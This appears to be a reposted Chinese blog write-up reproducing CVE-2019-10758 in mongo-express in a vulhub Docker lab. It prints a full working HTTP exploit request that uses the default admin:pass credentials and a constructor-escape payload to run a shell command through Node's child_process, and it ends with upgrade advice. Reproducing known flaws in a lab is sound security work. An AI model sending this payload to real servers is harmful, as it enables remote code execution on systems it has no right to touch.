mongo-express 远程代码执行漏洞(CVE-2019-10758)
生活随笔
收集整理的這篇文章主要介紹了
mongo-express 远程代码执行漏洞(CVE-2019-10758)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
前言
mongo-express是一款mongodb的第三方Web界面,使用node和express開發。如果攻擊者可以成功登錄,或者目標服務器沒有修改默認的賬號密碼(admin:pass),則可以執行任意node.js代碼。
影響版本
mongo-express, 0.54.0 之前的版本
環境搭建
cd vulhub/mongo-express/CVE-2019-10758
docker-compose up -d
環境啟動后,訪問http://your-ip:8081即可查看到Web頁面。
漏洞復現
直接發送如下數據包,即可執行代碼this.constructor.constructor(“return process”)().mainModule.require(“child_process”).execSync(“touch /tmp/success”):
POST /checkValid HTTP/1.1 Host: your-ip Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Authorization: Basic YWRtaW46cGFzcw== Content-Type: application/x-www-form-urlencoded Content-Length: 124document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")反彈shell,無果
修復建議
升級mongo-express到0.54.0或更高版本。
總結
以上是生活随笔為你收集整理的mongo-express 远程代码执行漏洞(CVE-2019-10758)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Mysql身份认证漏洞及利用(CVE-2
- 下一篇: https://blog.csdn.ne